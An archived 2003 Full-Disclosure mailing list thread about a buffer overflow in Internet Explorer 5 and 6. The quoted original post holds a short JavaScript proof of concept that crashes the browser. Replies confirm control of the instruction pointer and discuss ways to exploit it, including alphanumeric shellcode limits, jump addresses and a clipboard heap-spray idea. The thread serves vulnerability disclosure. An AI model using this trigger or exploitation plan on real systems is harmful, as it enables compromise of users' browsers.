Re: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

From: 3APA3A (3APA3A_at_SECURITY.NNOV.RU)
Date: 06/30/03

Next message: Cesar: "Re: [Full-Disclosure] RE: [Symantec Security Advisor] Symantec Security Check ActiveX Buffer Overflow"

Previous message: morning_wood: "[Full-Disclosure] Megabook 2.0 -XSS & UA execution"
In reply to: SecurITeam BugTraq Monitoring: "[Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "SecurITeam BugTraq Monitoring" <bugtraq@securiteam.com>
Date: Mon, 30 Jun 2003 21:17:06 +0400

Dear SecurITeam BugTraq Monitoring,

It could be perfectly easy to exploit this vulnerability with
alphanumeric shellcode... There is a lot of appropriate addresses, for
example with jmp esp in different libraries (NT4 + IE6):

0x636e6294 0x70286161 0x70286221, etc

But _real_ problem is it also does toupper() for all characters. So,
0x63 0x70 etc cannot be used. It's still possible to create shellcode,
but I see no way to get control, because we have no appropriate address
to overwrite EBP/ESP... So, it's impossible to exploit it in usual way.

It's possible to put huge (few megabytes of) shellcode on the heap (just
to put it in the clipboard too) and try to get something like

jmp 0x20XXXXXX or jmp 0x21XXXXXX

in 0x20200000 - 0x60FFFFFF and 0x7B200000 - 0x7FFFFFFF

because heap usually allocated somewhere in the end of 0x20XXXXXX it
looks possible... That is we can put 8MB of jmp 0x21777777 + 8MB of
NOOPs + shellcode into clipboard and overwrite EIP with something like
0x21212121.... But this exploit will work an hour with 100% CPU load
because clipboard operations are slow :)

Any suggestions?

--Wednesday, June 25, 2003, 3:05:20 PM, you wrote to dotslash@snosoft.com:

SBM> Hi,

SBM> I can confirm it under Windows 2000 with IE 5.50.4807.2300

SBM> Full control over the EIP, but the shellcode cannot contain (as it currently
SBM> appears) non Alpha Numeric characters, too bad I guess.

SBM> Thanks
SBM> Noam Rathaus
SBM> CTO
SBM> Beyond Security Ltd
SBM> http://www.SecurITeam.com
SBM> http://www.BeyondSecurity.com
SBM> ----- Original Message -----
SBM> From: "KF" <dotslash@snosoft.com>
SBM> To: "Digital Scream" <digitalscream@real.xakep.ru>
SBM> Sent: Monday, June 23, 2003 6:43 PM
SBM> Subject: Re: Internet Explorer >=5.0 : Buffer overflow

>> I can confirm this on Windows XP Professional
>>
>> version 6.0.2800.1106.xpsp2-030422-1633
>>
>> 0x43534c41 refrenced mem at 0x43534c41
>> -KF
>>
>>
>> Digital Scream wrote:
>>
>> ><script>
>> > wnd=open("about:blank","","");
>> > wnd.moveTo(screen.Width,screen.Height);
>> > WndDoc=wnd.document;
>> > WndDoc.open();
>> > WndDoc.clear();
>> > buffer="";
>> > for(i=1;i<=127;i++)buffer+="X";
>> > buffer+="DigitalScream";
>> > WndDoc.write("<HR align='"+buffer+"'>");
>> > WndDoc.execCommand("SelectAll");
>> > WndDoc.execCommand("Copy");
>> > wnd.close();
>> ></script>
>> >
>> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
>> >
>> >
>> >
>>
>>
>>

SBM> _______________________________________________
SBM> Full-Disclosure - We believe in it.
SBM> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
~/ZARAZA
Вечная память святому Патрику! (Твен)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Cesar: "Re: [Full-Disclosure] RE: [Symantec Security Advisor] Symantec Security Check ActiveX Buffer Overflow"

Previous message: morning_wood: "[Full-Disclosure] Megabook 2.0 -XSS & UA execution"
In reply to: SecurITeam BugTraq Monitoring: "[Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]